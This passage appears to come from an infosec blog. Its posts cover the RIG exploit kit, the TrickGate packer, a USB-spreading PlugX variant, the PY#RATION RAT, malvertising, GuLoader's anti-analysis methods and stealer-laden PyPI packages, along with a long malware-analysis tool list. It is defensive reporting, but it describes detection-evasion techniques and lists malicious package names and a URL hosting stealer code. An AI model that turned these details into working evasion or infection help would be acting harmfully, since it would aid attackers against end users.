    As a result, visitors using a vulnerable version of a browser to access an actor-controlled web page or a compromised-but-legitimate website are redirected using malicious JavaScript code to a proxy server, which, in turn, communicates with an exploit server to deliver the appropriate browser exploit.

    The exploit server, for its part, detects the user’s browser by parsing the User-Agent string and returns the exploit that “matches the pre-defined vulnerable browser versions.”

    “The artful design of the Exploit Kit allows it to infect devices with little to no interaction from the end user,” the researchers said. “Meanwhile, its use of proxy servers makes infections harder to detect.”

    Since arriving on the scene in 2014, RIG EK has been observed delivering a wide range of financial trojans, stealers, and ransomware such as AZORultCryptoBitDridex, Raccoon Stealer, and WastedLoader. The operation was dealt a huge blow in 2017 following a coordinated action that dismantled its infrastructure.

    For more details:

    https://thehackernews.com/2023/02/researchers-share-new-insights-into-rig.html

    Tags: Exploit Kit, Malware Analysis


    Feb 03 2023

    MAJORITY OF THE RANSOMWARE GANGS USED THIS PACKER TO BYPASS ANTIVIRUS AND ENCRYPT DEVICES

    Category: Malware,RansomwareDISC @ 11:02 am

    Packers are becoming an increasingly important tool for cybercriminals to use in the commission of illegal acts. On hacker forums, the packer is sometimes referred to as “Crypter” and “FUD.” Its primary function is to make it more difficult for antivirus systems to identify malicious code. Malicious actors are able to disseminate their malware more quickly and with fewer consequences when they use a packer. It doesn’t matter what the payload is, which is one of the primary qualities of a commercial Packer-as-a-Service, which implies that it may be used to pack a variety of different harmful samples. This opens up a lot of opportunities for cybercriminals. Another key quality of the packer is that it is transformational. Because the packer’s wrapper is changed on a frequent basis, it is able to avoid detection by devices designed to enhance security.

    According to Checkpoint, TrickGate is an excellent illustration of a robust and resilient packer-as-a-service. It has been able to go under the radar of cyber security researchers for a number of years and is consistently becoming better in a variety of different ways.

    Although a lot of very good study was done on the packer itself, TrickGate is a master of disguises and has been given a number of different titles due to the fact that it has so many different characteristics. A number of names have been given to it, including “TrickGate,” “Emotet’s packer,” “new loader,” “Loncom,” and “NSIS-based crypter.”

    At the end of 2016, they made our first observation of TrickGate. During that time, it was used to spread the Cerber malware. Since that time, they have been doing ongoing research on TrickGate and have discovered that it is used to propagate many forms of malicious software tools, including ransomware, RATs, information thieves, bankers, and miners. It has come to their attention that a significant number of APT organizations and threat actors often employ TrickGate to wrap their malicious code in order to evade detection by security solutions. Some of the most well-known and top-distribution malware families have been wrapped by TrickGate,

    including Cerber, Trickbot, Maze, Emotet, REvil, CoinMiner, Cobalt Strike, DarkVNC, BuerLoader, HawkEye, NetWire, AZORult, Formbook, Remcos, Lokibot, AgentTesla, and many more. TrickGate has also been involved in the wrapping of many other malware.

    Tags: BYPASS ANTIVIRUS AND ENCRYPT DEVICES


    Jan 28 2023

    PlugX Malware Sneaks Onto Windows PCs Through USB Devices

    Category: Malware,Windows SecurityDISC @ 9:29 am

    PlugX malware has been around for almost a decade and has been used by multiple actors of Chinese nexus and several other cybercrime groups.

    The Palo Alto Networks Unit 42 incident response team has discovered a new variant of PlugX malware that is distributed via removable USB devices and targets Windows PCs. This should not come as a surprise since 95.6% of new malware or their variants in 2022 targeted Windows.

    According to Unit 42 researchers, the new variant was detected when carrying out an incident response post a Black Basta ransomware attack. The researchers uncovered several malware samples and tools on the victims’ devices. This includes the Brute Ratel C4 red-teaming tool, GootLoader malware, and an old PlugX sample.

    PlugX malware has been around for almost a decade and has been used by multiple actors of Chinese nexus and several other cybercrime groups. The malware was previously used in many high-profile cyberattacks, such as the 2015 U.S. Government Office of Personnel Management (OPM) breach.

    The same backdoor was also used in the 2018 malware attack on the Android devices of minority groups in China. Most recently, in November 2022, researchers linked Google Drive phishing scams to the group infamously known for using PlugX malware.

    Scope of Infection

    The new variant stood out among other malware because it could infect any attached removable USB device, e.g., floppy, flash, thumb drives, and any system the removable device was plugged into later.

    So far, no evidence connects the PlugX backdoor or Gootkit to the Black Basta ransomware group, and researchers believe another actor could have deployed it. Moreover, researchers noted that the malware could copy all Adobe PDF and Microsoft Word documents from the host and places them in a hidden folder on the USB device. The malware itself creates this folder.

    PlugX Malware Being Distributed through Removable USB Devices

    Malware Analysis

    Unit 42 researchers Jen Miller-Osborn and Mike Harbison explained in their blog post that this variant of PlugX malware is a wormable, second-stage implant. It infects USB devices and stays concealed from the Windows operating file system. The user would not suspect that their USB device is being exploited to exfiltrate data from networks. 

    PlugX’s USB variant is different because it uses a specific Unicode character called non-breaking space/ U+00A0 to hide files in a USB device plugged into a workstation. This character prevents the Windows OS from rendering the directory name instead of leaving an anonymous folder in Explorer.

    Furthermore, the malware can hide actor files in a removable USB device through a novel technique, which even works on the latest Windows OS

    The malware is designed to infect the host and copy the malicious code on any removable device connected to the host by hiding it in a recycle bin folder. Since MS Windows OS by default doesn’t show hidden files, the malicious files in recycle bin aren’t displayed, but, surprisingly, it isn’t shown even with the settings enabled. These malicious files can be viewed/downloaded only on a Unix-like OS or through mounting the USB device in a forensic tool.

    Mastering Windows Security and Hardening: Secure and protect your Windows environment from intruders, malware attacks, and other cyber threats

    InfoSec books | InfoSec tools | InfoSec services

    Tags: PlugX Malware


    Jan 27 2023

    New Python Malware Targeting Windows Devices

    Category: Malware,PythonDISC @ 10:26 am

    The malware features also include file transfer, keylogging, stealing passwords stored in the browser, clipboard data stealing, cookies exfiltration and more.

    Threat analysis firm Securonix’s cybersecurity researchers have discovered a new malware dubbed PY#RATION allowing attackers to steal sensitive files and log keystrokes from impacted devices.

    Malware Distribution Technique

    The malware is distributed through a conventional phishing mechanism in which the email contains a password-protected ZIP archive. When it is unpacked, two shortcut image files appear, titled front.jpg.lkn and back.jpg.lnk. When launched, these files display the front and back of a driver’s license that doesn’t exist.

    New Python Malware Targeting Windows Devices
    Images used in the scam (Credit: Securonix)

    With this, the malicious code is also executed, leading to two new files being downloaded from the internet. These files are titled front.txt and back.txt, later renamed to .bat docs and executed. The malware disguises itself as Cortana virtual assistant to ensure persistence on the system.

    What is PY#RATION

    PY#RATION is a Python-based malware that displays a RAT (remote access trojan) like behaviour to sustain control over the affected host. The malware has various capabilities and functionalities, such as keylogging and data exfiltration.

    However, the unique aspect is that it uses WebSocket for exfiltration and C2 communication, and evades detection from network security solutions and antivirus programs. Leveraging Python’s built-in Socket.IO framework that facilitates client and server WebSocket communications, the malware pulls data and gets commands over a single TCP connection through open ports simultaneously.

    Moreover, according to a blog post published by Securonix, the attackers use the same C2 address, which the IPVoid checking system is yet to block. Researchers believe this malware is still under active development as they have detected multiple versions since August 2022. The malware receives instructions from the operations through WebSocket and obtains sensitive data.

    Potential Dangers

    This Python RAT is packed into an executable that uses automated packers such as ‘pyinstaller’ and ‘py2exe’ to convert Python code into Windows executables. This helps inflate payload size (The first detected version 1.0 being 14MB and the last detected version 1.6.0 being 32 MB containing 1000+ lines and additional code).

    New Python Malware Targeting Windows Devices
    Infection chain of the PY#RATION python malware (Credit: Securonix)

    Researchers claim that the latest version of the payload remains undetected by all except for one antivirus engine listed on VirusTotal.

    The malware features include file transfer to and from the C2 server, network enumeration, shell command execution, keylogging, stealing passwords stored in the browser, host enumeration, clipboard data stealing, and cookies exfiltration. Who’s behind this campaign, the distribution volume, and campaign objectives are still unclear.

    Python for Cybersecurity: Using Python for Cyber Offense and Defense


    InfoSec books
     | InfoSec tools | InfoSec services

    Tags: Python Malware


    Jan 19 2023

    Google ads increasingly pointing to malware

    Category: MalwareDISC @ 11:13 am

    The FBI has recently warned the public about search engine ads pushing malware disguised as legitimate software – an old tactic that has lately resulted in too many malicious ads served to users searching for software, cracked software, drivers – anything that can be downloaded, really – via Google and Bing.

    The recent explosion of search engine malvertising

    Malware peddlers employ a variety of methods to deliver their wares to unsuspecting users:

    The latter tactic is particularly good at hitting a wide pool of potential targets, since most internet users also use search engines.

    Lately, though, they have been overdoing it – or perhaps it’s just that more people have begun noticing it and talking about it online?

    Many documented campaigns

    HP threat researcher Patrick Schläpfer says that they have seen “a significant increase in malware distributed through malvertising, with multiple threat actors currently using this technique.”

    Some of these campaigns have been going on since late last year, and mostly target users searching to download popular software (e.g., Audacity, Blender 3D, GIMP, Notepad++, Microsoft Teams, Discord, Microsoft OneNote, 7zipOBS, etc.).

    malicious Google ads

    The malicious ads often manage to be the first link users see when searching for software on Google, and point to a (usually typosquatting) domain that resembles the original software manufacturer’s page. Clicking on the download link triggers the download of the malicious package from a file-hosting and sharing service (e.g., Dropbox), an app development platform (e.g., Google Firebase), or a code-hosting service (e.g., GitHub).

    Protect yourself and your loved ones

    While Google and Microsoft are trying to keep their users safe, it’s becoming obvious that they are failing to keep pace with the rapid change of tricks employed by cybercriminals to push those ads.

    As some ads are removed and new ones inevitably spring up, we are forced to do what we can to protect themselves.

    Just being aware of this danger and knowing about the prevalence of these malicious ads will help. Also, carefully check whether the URL to which the advertisement points is the correct one (e.g., by comparing it with the official domain listed on the software’s Wikipedia page).

    If you fail to spot the malicious nature of the ad and the typosquatting site, don’t ignore warnings you might get from Microsoft Defender or another security solution you use.

    malicious Google ads

    But the best advice may be to completely avoid clicking on Google and Bing ads – either by recognizing them and avoiding them consciously, or by installing an ad-blocking extension that will stop those ads from being displayed. That latter option is perhaps the best one for less tech-savvy users, to completely remove the temptation of willy-nilly clicking on potentially malicious ads – wherever they might pop up.

    Google and Microsoft, on the other hand, may want to ramp up their efforts to block this kind of abuse of their ad network, or risk their reputation being dented and more and more users start using ad blockers.

    Learn Malware Removal Techniques: How to remove malwares from a computer

    Checkout our previous posts on “Malware” topic

    InfoSec books | InfoSec tools | InfoSec services

    Tags: Google ads


    Jan 07 2023

    Best Malware Analysis Tools List For Security Researchers & Malware Analyst 2023

    Category: Malware,Security ToolsDISC @ 1:24 pm

    Malware analysis tools are highly essential for Security Professionals who always need to learn many tools, techniques, and concepts to analyze sophisticated Threats and current cyber attacks.

    Most Important Security Tools and Resources For Security Researcher and Malware Analyst

    Malware Analysis Tools & Courses

    • Malware Analysis Courses
    • Hex Editors
    • Disassemblers
    • Detection and Classification
    • Dynamic Binary Instrumentation
    • Dynamic Analysis
    • Deobfuscation
    • Debugging
    • Malware Analaysis Courses
    • Reverse Engineering
    • Binary Analysis
    • Decompiler
    • Bytecode Analysis
    • Reconstruction
    • Memory Forensics
    • Windows Artifacts
    • Storage and Workflow
    • Malware samples
    • Courses
    • Domain Analysis
    • Books

    Malware Analysis Courses

    Here we have listed the best courses list for malware analysis, reverse engineering, exploit development and more..

    Hex Editors

    A hex editor (or binary file editor or byteeditor) is a type of computer program that allows for manipulation of the fundamental binary data that constitutes a computer file. The name ‘hex’ comes from ‘hexadecimal’: a standard numerical format for representing binary data.

    Disassemblers 

    disassembler is a computer program that translates machine language into assembly language—the inverse operation to that of an assembler.

    A disassembler differs from a decompiler, which targets a high-level language rather than an assembly language. Disassembly, the output of a disassembler, is often formatted for human-readability rather than suitability for input to an assembler, making it principally a reverse-engineering tool.

    Detection and Classification

    • AnalyzePE – Wrapper for a variety of tools for reporting on Windows PE files.
    • Assemblyline – A scalable distributed file analysis framework.
    • BinaryAlert – An open source, serverless AWS pipeline that scans and alerts on uploaded files based on a set of YARA rules.
    • ClamAV – Open source antivirus engine.
    • Detect-It-Easy – A program for determining types of files.
    • ExifTool – Read, write and edit file metadata.
    • File Scanning Framework – Modular, recursive file scanning solution.
    • hashdeep – Compute digest hashes with a variety of algorithms.
    • Loki – Host based scanner for IOCs.
    • Malfunction – Catalog and compare malware at a function level.
    • MASTIFF – Static analysis framework.
    • MultiScanner – Modular file scanning/analysis framework
    • nsrllookup – A tool for looking up hashes in NIST’s National Software Reference Library database.
    • packerid – A cross-platform Python alternative to PEiD.
    • PEV – A multiplatform toolkit to work with PE files, providing feature-rich tools for proper analysis of suspicious binaries.
    • Rootkit Hunter – Detect Linux rootkits.
    • ssdeep – Compute fuzzy hashes.
    • totalhash.py – Python script for easy searching of the TotalHash.cymru.com database.
    • TrID – File identifier.
    • YARA – Pattern matching tool for analysts.
    • Yara rules generator – Generate yara rules based on a set of malware samples. Also contains a good strings DB to avoid false positives

    Dynamic Binary Instrumentation

    Dynamic Binary Instrumentation Tools

    Mac Decrypt

    Mac Decrypting Tools

    Emulator

    Emulator Tools

    Document Analysis

    Document Based Malware Analysis Tools.

    Dynamic Analysis

    This introductory malware dynamic analysis class is dedicated to people who are starting to work on malware analysis or who want to know what kinds of artifacts left by malware can be detected via various tools.

    The class will be a hands-on class where students can use various tools to look for how malware is: Persisting, Communicating, and Hiding

    Deobfuscation Malware Analysis Tools

    Reverse XOR and other code obfuscation methods.

    • Balbuzard – A malware analysis tool for reversing obfuscation (XOR, ROL, etc) and more.
    • de4dot – .NET deobfuscator and unpacker.
    • ex_pe_xor & iheartxor – Two tools from Alexander Hanel for working with single-byte XOR encoded files.
    • FLOSS – The FireEye Labs Obfuscated String Solver uses advanced static analysis techniques to automatically deobfuscate strings from malware binaries.
    • NoMoreXOR – Guess a 256 byte XOR key using frequency analysis.
    • PackerAttacker – A generic hidden code extractor for Windows malware.
    • unpacker – Automated malware unpacker for Windows malware based on WinAppDbg.
    • unxor – Guess XOR keys using known-plaintext attacks.
    • VirtualDeobfuscator – Reverse engineering tool for virtualization wrappers.
    • XORBruteForcer – A Python script for brute forcing single-byte XOR keys.
    • XORSearch & XORStrings – A couple programs from Didier Stevens for finding XORed data.
    • xortool – Guess XOR key length, as well as the key itself.

    Debugging

    IN this List we could  see the tools for Disassemblers, debuggers, and other static and dynamic analysis tools.Cross-Platform Debugging Tools

    Windows-Only Debugging Tools

    Linux-Only Debugging Tools

    Reverse Engineering 

    • angr – Platform-agnostic binary analysis framework developed at UCSB’s Seclab.
    • bamfdetect – Identifies and extracts information from bots and other malware.
    • BAP – Multiplatform and open source (MIT) binary analysis framework developed at CMU’s Cylab.
    • BARF – Multiplatform, open source Binary Analysis and Reverse engineering Framework.
    • binnavi – Binary analysis IDE for reverse engineering based on graph visualization.
    • Binary ninja – A reversing engineering platform that is an alternative to IDA.
    • Binwalk – Firmware analysis tool.
    • Bokken – GUI for Pyew and Radare. (mirror)
    • Capstone – Disassembly framework for binary analysis and reversing, with support for many architectures and bindings in several languages.
    • codebro – Web based code browser using  clang to provide basic code analysis.
    • DECAF (Dynamic Executable Code Analysis Framework) – A binary analysis platform based   on QEMU. DroidScope is now an extension to DECAF.
    • dnSpy – .NET assembly editor, decompiler and debugger.
    • Evan’s Debugger (EDB) – A modular debugger with a Qt GUI.
    • Fibratus – Tool for exploration and tracing of the Windows kernel.
    • FPort – Reports open TCP/IP and UDP ports in a live system and maps them to the owning application.
    • GDB – The GNU debugger.
    • GEF – GDB Enhanced Features, for exploiters and reverse engineers.
    • hackers-grep – A utility to search for strings in PE executables including imports, exports, and debug symbols.
    • Hopper – The macOS and Linux Disassembler.
    • IDA Pro – Windows disassembler and debugger, with a free evaluation version.
    • Immunity Debugger – Debugger for malware analysis and more, with a Python API.
    • ILSpy – ILSpy is the open-source .NET assembly browser and decompiler.
    • Kaitai Struct – DSL for file formats / network protocols / data structures reverse engineering and dissection, with code generation for C++, C#, Java, JavaScript, Perl, PHP, Python, Ruby.
    • LIEF – LIEF provides a cross-platform library to parse, modify and abstract ELF, PE and MachO formats.
    • ltrace – Dynamic analysis for Linux executables.
    • objdump – Part of GNU binutils, for static analysis of Linux binaries.
    • OllyDbg – An assembly-level debugger for Windows executables.
    • PANDA – Platform for Architecture-Neutral Dynamic Analysis.
    • PEDA – Python Exploit Development Assistance for GDB, an enhanced display with added commands.
    • pestudio – Perform static analysis of Windows executables.
    • Pharos – The Pharos binary analysis framework can be used to perform automated static analysis of binaries.
    • plasma – Interactive disassembler for x86/ARM/MIPS.
    • PPEE (puppy) – A Professional PE file Explorer for reversers, malware researchers and those who want to statically inspect PE files in more detail.
    • Process Explorer – Advanced task manager for Windows.
    • Process Hacker – Tool that monitors system resources.
    • Process Monitor – Advanced monitoring tool for Windows programs.
    • PSTools – Windows command-line tools that help manage and investigate live systems.
    • Pyew – Python tool for malware analysis.
    • PyREBox – Python scriptable reverse engineering sandbox by the Talos team at Cisco.
    • QKD – QEMU with embedded WinDbg server for stealth debugging.
    • Radare2 – Reverse engineering framework, with debugger support.
    • RegShot – Registry compare utility that compares snapshots.
    • RetDec – Retargetable machine-code decompiler with an online decompilation service and API that you can use in your tools.
    • ROPMEMU – A framework to analyze, dissect and decompile complex code-reuse attacks.
    • SMRT – Sublime Malware Research Tool, a plugin for Sublime 3 to aid with malware analyis.
    • strace – Dynamic analysis for Linux executables.
    • Triton – A dynamic binary analysis (DBA) framework.
    • Udis86 – Disassembler library and tool for x86 and x86_64.
    • Vivisect – Python tool for malware analysis.
    • WinDbg – multipurpose debugger for the Microsoft Windows computer operating system, used to debug user mode applications, device drivers, and the kernel-mode memory dumps.
    • X64dbg – An open-source x64/x32 debugger for windows.

    Binary Format and  Binary Analysis

    The Compound File Binary Format is the basic container used by several different Microsoft file formats such as Microsoft Office documents and Microsoft Installer packages.

    Binary Analysis Resources

     

    Decompiler 

    A decompiler is a computer program that takes an executable file as input, and attempts to create a high level source file which can be recompiled successfully. It is therefore the opposite of a compiler, which takes a source file and makes an executable.Generic Decompiler

    Java Decompiler

    .NET Decompiler

    Delphi Decompiler

    Python Decompiler

    Bytecode Analysis

    Bytecode Analysis Tools

    Malware Analysis Tools for Reconstruction

    Import Reconstruction Tools

    • AndroTotal – Free online analysis of APKs against multiple mobile antivirus apps.
    • AVCaesar – Malware.lu online scanner and malware repository.
    • Cryptam – Analyze suspicious office documents.
    • Cuckoo Sandbox – Open source, self hosted sandbox and automated analysis system.
    • cuckoo-modified – Modified version of Cuckoo Sandbox released under the GPL. Not merged upstream due to legal concerns by the author.
    • cuckoo-modified-api – A Python API used to control a cuckoo-modified sandbox.
    • DeepViz – Multi-format file analyzer with machine-learning classification.
    • detux – A sandbox developed to do traffic analysis of Linux malwares and capturing IOCs.
    • DRAKVUF – Dynamic malware analysis system.
    • firmware.re – Unpacks, scans and analyzes almost any firmware package.
    • HaboMalHunter – An Automated Malware Analysis Tool for Linux ELF Files.
    • Hybrid Analysis – Online malware analysis tool, powered by VxSandbox.
    • IRMA – An asynchronous and customizable analysis platform for suspicious files.
    • Joe Sandbox – Deep malware analysis with Joe Sandbox.
    • Jotti – Free online multi-AV scanner.
    • Limon – Sandbox for Analyzing Linux Malware.
    • Malheur – Automatic sandboxed analysis of malware behavior.
    • malsub – A Python RESTful API framework for online malware and URL analysis services.
    • Malware config – Extract, decode and display online the configuration settings from common malwares.
    • Malwr – Free analysis with an online Cuckoo Sandbox instance.
    • MASTIFF Online – Online static analysis of malware.
    • Metadefender.com – Scan a file, hash or IP address for malware (free).
    • NetworkTotal – A service that analyzes pcap files and facilitates the quick detection of viruses, worms, trojans, and all kinds of malware using Suricata configured with EmergingThreats Pro.
    • Noriben – Uses Sysinternals Procmon to collect information about malware in a sandboxed environment.
    • PDF Examiner – Analyse suspicious PDF files.
    • ProcDot – A graphical malware analysis tool kit.
    • Recomposer – A helper script for safely uploading binaries to sandbox sites.
    • Sand droid – Automatic and complete Android application analysis system.
    • SEE – Sandboxed Execution Environment (SEE) is a framework for building test automation in secured Environments.
    • VirusTotal – Free online analysis of malware samples and URLs
    • Visualize_Logs – Open source visualization library and command line tools for logs. (Cuckoo, Procmon, more to come…)
    • Zeltser’s List – Free automated sandboxes and services, compiled by Lenny Zeltser.

    Document Analysis

    Document Analysis Tools

    Scripting

    Scripting

    Android

    Android tools

    Yara

    Yara Resources

    Memory Forensics Malware Analysis Tools 

    Tools for dissecting malware in memory images or running systems.

    • BlackLight – Windows/MacOS forensics client supporting hiberfil, pagefile, raw memory analysis.
    • DAMM – Differential Analysis of Malware in Memory, built on Volatility.
    • evolve – Web interface for the Volatility Memory Forensics Framework.
    • FindAES – Find AES encryption keys in memory.
    • inVtero.net – High speed memory analysis framework developed in .NET supports all Windows x64, includes code integrity and write support.
    • Muninn – A script to automate portions of analysis using Volatility, and create a readable report.
    • Rekall – Memory analysis framework, forked from Volatility in 2013.
    • TotalRecall – Script based on Volatility for automating various malware analysis tasks.
    • VolDiff – Run Volatility on memory images before and after malware execution, and report changes.
    • Volatility – Advanced memory forensics framework.
    • VolUtility – Web Interface for Volatility Memory Analysis framework.
    • WDBGARK – WinDBG Anti-RootKit Extension.
    • WinDbg – Live memory inspection and kernel debugging for Windows systems.

    Windows Artifacts

    • AChoir – A live incident response script for gathering Windows artifacts.
    • python-evt – Python library for parsing Windows Event Logs.
    • python-registry – Python library for parsing registry files.
    • RegRipper (GitHub) – Plugin-based registry analysis tool.

    Storage and Workflow

    • Aleph – Open Source Malware Analysis Pipeline System.
    • CRITs – Collaborative Research Into Threats, a malware and threat repository.
    • FAME – A malware analysis framework featuring a pipeline that can be extended with custom modules, which can be chained and interact with each other to perform end-to-end analysis.
    • Malwarehouse – Store, tag, and search malware.
    • Polichombr – A malware analysis platform designed to help analysts to reverse malwares collaboratively.
    • stoQ – Distributed content analysis framework with extensive plugin support, from input to output, and everything in between.
    • Viper – A binary management and analysis framework for analysts and researchers.

    Malware samples

    Malware samples collected for analysis.

    • Clean MX – Realtime database of malware and malicious domains.
    • Contagio – A collection of recent malware samples and analyses.
    • Exploit Database – Exploit and shellcode samples.
    • Malshare – Large repository of malware actively scrapped from malicious sites.
    • MalwareDB – Malware samples repository.
    • Open Malware Project – Sample information and downloads. Formerly Offensive Computing.
    • Ragpicker – Plugin based malware crawler with pre-analysis and reporting functionalities
    • theZoo – Live malware samples for analysts.
    • Tracker h3x – Agregator for malware corpus tracker and malicious download sites.
    • ViruSign – Malware database that detected by many anti malware programs except ClamAV.
    • VirusShare – Malware repository, registration required.
    • VX Vault – Active collection of malware samples.
    • Zeltser’s Sources – A list of malware sample sources put together by Lenny Zeltser.
    • Zeus Source Code – Source for the Zeus trojan leaked in 2011.

    Domain Malware Analysis Tools

    Inspect domains and IP addresses.

    • badips.com – Community based IP blacklist service.
    • boomerang – A tool designed for consistent and safe capture of off network web resources.
    • Cymon – Threat intelligence tracker, with IP/domain/hash search.
    • Desenmascara.me– One click tool to retrieve as much metadata as possible for a website and to assess its good standing.
    • Dig – Free online dig and other network tools.
    • dnstwist – Domain name permutation engine for detecting typo squatting, phishing and corporate espionage.
    • IPinfo – Gather information about an IP or domain by searching online resources.
    • Machinae – OSINT tool for gathering information about URLs, IPs, or hashes. Similar to Automator.
    • mailchecker – Cross-language temporary email detection library.
    • MaltegoVT – Maltego transform for the VirusTotal API. Allows domain/IP research, and searching for file hashes and scan reports.
    • Multi rbl – Multiple DNS blacklist and forward confirmed reverse DNS lookup over more than 300 RBLs.
    • NormShield Services – Free API Services for detecting possible phishing domains, blacklisted ip addresses and breached accounts.
    • SpamCop – IP based spam block list.
    • SpamHaus – Block list based on domains and IPs.
    • Sucuri SiteCheck – Free Website Malware and Security Scanner.
    • Talos Intelligence – Search for IP, domain or network owner. (Previously SenderBase.)
    • TekDefense Automater – OSINT tool for gathering information about URLs, IPs, or hashes.
    • URLQuery – Free URL Scanner.
    • Whois – DomainTools free online whois search.
    • Zeltser’s List – Free online tools for researching malicious websites, compiled by Lenny Zeltser.
    • ZScalar Zulu – Zulu URL Risk Analyzer.

    Books 

    Most Important books Reverse Engineering Books

    Documents and Shellcode

    Analyze malicious JS and shellcode from PDFs and Office documents. See also the browser malware section.

    • AnalyzePDF – A tool for analyzing PDFs and attempting to determine whether they are malicious.
    • box-js – A tool for studying JavaScript malware, featuring JScript/WScript support and ActiveX emulation.
    • diStorm – Disassembler for analyzing malicious shellcode.
    • JS Beautifier – JavaScript unpacking and deobfuscation.
    • JS Deobfuscator – Deobfuscate simple Javascript that use eval or document.write to conceal its code.
    • libemu – Library and tools for x86 shellcode emulation.
    • malpdfobj – Deconstruct malicious PDFs into a JSON representation.
    • OfficeMalScanner – Scan for malicious traces in MS Office documents.
    • olevba – A script for parsing OLE and OpenXML documents and extracting useful information.
    • Origami PDF – A tool for analyzing malicious PDFs, and more.
    • PDF Tools – pdfid, pdf-parser, and more from Didier Stevens.
    • PDF X-Ray Lite – A PDF analysis tool, the backend-free version of PDF X-RAY.
    • peepdf – Python tool for exploring possibly malicious PDFs.
    • QuickSand – QuickSand is a compact C framework to analyze suspected malware documents to identify exploits in streams of different encodings and to locate and extract embedded executables.
    • Spidermonkey – Mozilla’s JavaScript engine, for debugging malicious JS.

    Practice Malware Analysis Tools 

    Practice Reverse Engineering. Be careful with malware.

    Open Source Threat Intelligence Tool

    Harvest and analyze IOCs.

    • AbuseHelper – An open-source framework for receiving and redistributing abuse feeds and threat intel.
    • AlienVault Open Threat Exchange – Share and collaborate in developing Threat Intelligence.
    • Combine – Tool to gather Threat Intelligence indicators from publicly available sources.
    • Fileintel – Pull intelligence per file hash.
    • Hostintel – Pull intelligence per host.
    • IntelMQ – A tool for CERTs for processing incident data using a message queue.
    • IOC Editor– A free editor for XML IOC files.
    • ioc_writer – Python library for working with OpenIOC objects, from Mandiant.
    • Massive Octo Spice – Previously known as CIF (Collective Intelligence Framework). Aggregates IOCs from various lists. Curated by the CSIRT Gadgets Foundation.
    • MISP – Malware Information Sharing Platform curated by The MISP Project.
    • Pulsedive – Free, community-driven threat intelligence platform collecting IOCs from open-source feeds.
    • PyIOCe – A Python OpenIOC editor.
    • RiskIQ – Research, connect, tag and share IPs and domains. (Was PassiveTotal.)
    • threataggregator – Aggregates security threats from a number of sources, including some of those listed below in other resources.
    • ThreatCrowd – A search engine for threats, with graphical visualization.
    • ThreatTracker – A Python script to monitor and generate alerts based on IOCs indexed by a set of Google Custom Search Engines.
    • TIQ-test – Data visualization and statistical analysis of Threat Intelligence feeds.

    Other Resources

    Credits

    This list is Created with helping of following Awesome Peoples.

    Infosec books | InfoSec tools | InfoSec services

    Tags: malware analysis tools


    Dec 29 2022

    GuLoader Malware Uses Advanced Anti-Analysis Techniques to Evade Detection

    Category: Antivirus,Malware,Threat detectionDISC @ 11:30 am

    An advanced malware downloader named GuLoader has recently been exposed by cybersecurity researchers at CrowdStrike. This advanced downloader has the capability to evade the detection of security software by adopting a variety of techniques.

    While analyzing the shellcode of GuLoader, a brand-new anti-analysis technique was discovered by CrowdStrike through which researchers would be able to identify if the malware is operating in an adversarial environment or not. While this is done by examining the whole process memory for any VM-related strings.

    Evolution of GuLoader Malware

    On infected machines, GuLoader (aka CloudEyE) distributes remote access trojans like AgentTeslaFormBookNanocoreNETWIRERemcos, and the Parallax RAT using the VBS downloader. 

    GuLoader has been active since at least 2019 and has undergone several changes in its functionality and delivery methods. Over time, the malware has become more sophisticated, using various methods to evade detection and avoid being removed from infected systems. 

    It has also been distributed through other channels, such as exploit kits and hacked websites. While it has evolved over time and has been used in various campaigns to deliver a range of malware, including ransomware, banking Trojans, and other types of malware.

    A strong anti-analysis technique was also deployed by GuLoader in order to avoid detection in order to remain undetected. 

    GuLoader exhibits a three-stage process, the VBScript script will first inject the shellcode embedded within it into the memory, then the next stage of the process will execute anti-analysis checks that will protect the code from being analyzed.

    Furthermore, the shellcode also incorporates the same anti-analysis methods in order to avoid detection by third parties. It is through this shellcode that an attacker is able to download a final payload of their choice and execute it with the same anti-analysis methods as the original shellcode on the host that is compromised.

    Detecting breakpoints used for code analysis is done with anti-debugging and anti-disassembling checks in the malware.

    There is also a redundant code injection mechanism that can be used to avoid the use of a NTDLL.dll hook that is commonly used by antivirus programs and EDRs.

    In order to detect and flag processes on Windows that may be suspicious, anti-malware engines use NTDLL.dll API hooking. 

    Anti-Analysis Techniques

    Here below we have mentioned the anti-analysis techniques used:-

    • Anti-Debugging
    • Anti-Virtual Machine
    • Process Hollowing

    It was pointed out by experts that GuLoader remains a treacherous threat that is constantly evolving as it continues to develop. Furthermore, experts also provided indicators of compromise for the latest version of the downloader, as well as other key information.

    GuLoader Malware Advanced Anti-Analysis

    Antivirus Bypass Techniques: Learn practical techniques and tactics to combat, bypass, and evade antivirus software

    Malware Analysis

    Infosec books | InfoSec tools | InfoSec services

    Tags: Antivirus Bypass Techniques, Evade Detection, Malware


    Dec 27 2022

    Hackers Deploy New Information Stealer Malware onto Python Developers’ Machines

    Category: Malware,PythonDISC @ 10:48 am

    Researchers at Phylum recently discovered that hackers had been injecting information stealer malware into Python developers’ machines in order to steal their information.

    As they dug deeper, they discovered a new stealer variant with many different names. While apart from this, the source code of the program reveals that it is a straightforward copy of the old Stealer, W4SP. 

    Attack Chain to Deploy Malware

    A stealer in this case dropped directly into the main.py file rather than obfuscating the code or being obvious about the attempts to escape detection.

    Only one instance has been found in which multiple stages were used in order to obfuscate and obscure the attacker’s intentions. In this case, the attacker used a package called chazz to pull obfuscated code from the klgrth.io website, using a simple first stage to get it.

    There is a great deal of similarity between the first stage of the stealer code and the injector code. While this has been obfuscated with BlankOBF, it’s an obfuscation program. As soon as it is de-obfuscated, it reveals the Leaf $tealer.

    Malicious Packages

    Listed below are packages that feature similar IOC and apart from this, what we can expect is this list will grow over the coming months and years:-

    • modulesecurity – “Celestial Stealer”
    • informmodule – “Leaf $tealer”
    • chazz – first stage that pull from https://www.klgrth.io/paste/j2yvv/raw which contains the obfuscated code shown above
    • randomtime – “ANGEL stealer”
    • proxygeneratorbil – “@skid STEALER”
    • easycordey – “@skid Stealer”
    • easycordeyy – “@skid Stealer”
    • tomproxies – “@skid STEALER”
    • sys-ej – “Hyperion Obfuscated code”
    • infosys – “@734 Stealer”
    • sysuptoer – “BulkFA Stealer”
    • nowsys – “ANGEL Stealer”
    • upamonkws – “PURE Stealer”
    • captchaboy – “@skid STEALER”
    • proxybooster – “Fade Stealer”

    W4SP Copies

    W4SP’s original publication in loTus’s repository has been disabled by GitHub staff due to the violation of the T&C of GitHub, and as a result, it will be not found anymore.

    It has been Phylum’s mission for some time to monitor the actions of these threat actors in an attempt to finally bring down their infrastructure, due to their persistent, pervasive, and egregious nature.

